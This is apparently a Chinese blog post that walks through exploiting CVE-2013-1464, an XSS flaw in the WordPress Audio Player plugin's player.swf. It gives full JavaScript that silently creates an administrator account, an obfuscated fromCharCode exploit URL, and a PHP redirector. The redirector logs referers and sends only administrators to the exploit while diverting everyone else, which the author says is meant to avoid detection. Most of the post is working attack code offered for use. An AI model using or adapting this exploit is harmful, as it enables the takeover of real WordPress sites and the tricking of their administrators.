[CVE-2013-1464]WordPress Audio Player Plugin XSS in SWF利用
View Code
1 try{ 2 var ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP"); 3 }catch(e){ 4 var ajaxRequest = new XMLHttpRequest(); 5 } 6 ajaxRequest.open("POST", "/wp/wp-admin/user-new.php", true); 7 ajax2=ajaxRequest; 8 ajaxRequest.send(null); 9 ajaxRequest.onreadystatechange=function(){ 10 if(ajaxRequest.readyState==4){ 11 var tosend="action=createuser&_wpnonce_create-user="+(((new RegExp(/name=\"_wpnonce_create-user\"\svalue=\"(.*)\"\s/)).exec(ajaxRequest.responseText))[1].split('"')[0])+"&_wp_http_referer=%2Fwp%2Fwp-admin%2Fuser-new.php&user_login=myusername0&email=myeamil0%40a.com&first_name=steve&last_name=aleen&url=&pass1=a123456&pass2=a123456&role=administrator&createuser=adduser"; 12 ajax2.open("POST", "/wp/wp-admin/user-new.php", true); 13 ajax2.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); 14 ajax2.send(tosend); 15 ajax2.onreadystatechange=function(){ 16 if(ajaxRequest.readyState==4){ 17 document.location='http://www.google.com.hk' 18 } 19 } 20 } 21 }
将上js,合并到一行里,然后转成ASCII码,通过eval来执行:
View Code
1 http://www.abc.com/wp/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){eval(String.fromCharCode(116,114,121,123,118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,88,77,76,72,84,84,80,34,41,59,125,99,97,116,99,104,40,101,41,123,118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,125,97,106,97,120……,125))}//
这是最终的利用URL
这段js的主要作用就是在wordpress后台处添加一个管理员组用户。因为要先获得页面的一个key值,所以才有两次的ajax请求。
所以它的利用是这样的,首先引诱管理员点击这个链接,然后js执行添加用户的操作,在添加完后跳转到不相干的地址上。
但在实际中发现,要把这么长的链接来留言,会被WP直接过滤掉,也可以用谷歌或类似的短域名,但最后还是位朋友的提醒,是让一个PHP文件来跳转回来这个利用URL。真是一个好想法。
具体是这样的,先判断来源,如果来源是包含wp-admin,那么极可能是管理员点击的,此时一般可以添加用户成功。所以就跳转到利用URL上,否则的话就跳转到广告等不相干的页面上去。这样,就可以减少被发现的风险。
代码如下:
1 <html> 2 <head> 3 </head> 4 <body> 5 <?php 6 7 $myfile="res.txt"; 8 $fp = fopen($myfile,"a+"); 9 10 $refer = $_SERVER['HTTP_REFERER']; 11 $towrite = "---".$refer."\n"; 12 13 fwrite($fp,$towrite); 14 fclose( $fp ); 15 $pos =0; 16 $url=""; 17 echo "1111"; 18 //极可能是管理员点击的链接,就跳转到利用url. 19 if( $pos =strpos( $refer,'wp-admin' )) 20 { 21 $url = substr( $refer, 0, $pos ); 22 $url = $url.'wp-content/plugins/audio-player/assets/player.swf?playerID=aa%5C%22))}catch(e){eval(String.fromCharCode(116,114,121,123,118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,88,77,76,72,84,84,80,34,41,59,125,99,97,116,99,104,40,101,41,123,118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,125,97,106,97,120……,125))}//'; 23 echo "<script>document.location='$url'</script>"; 24 //如果来源不含"wp-admin",那么很可能不是管理员,就跳转到不明真相的网站上去吧 25 }else{ 26 echo "<script>document.location='http://www.someotherwebsite.com'</script>"; 27 } 28 echo "OVER"; 29 ?> 30 31 </body> 32 </html>
这里其实有个有意思的跳转,假如refer来源自www.abc.com/wp-admin/… ,那打开这个PHP后会再跳转回利用的URL上,即www.abc.com/wp-content的一个有XSS 的flash上。而这个XSS利用最后又会跳转回这个PHP,而这次因为refer值为XSS利用URL,不再包含wp-admin,所以就会再次跳到一个不相干的广告页面上去。即abc.com->PHP->abc.com->PHP->otherwebsite.
浙公网安备 33010602011771号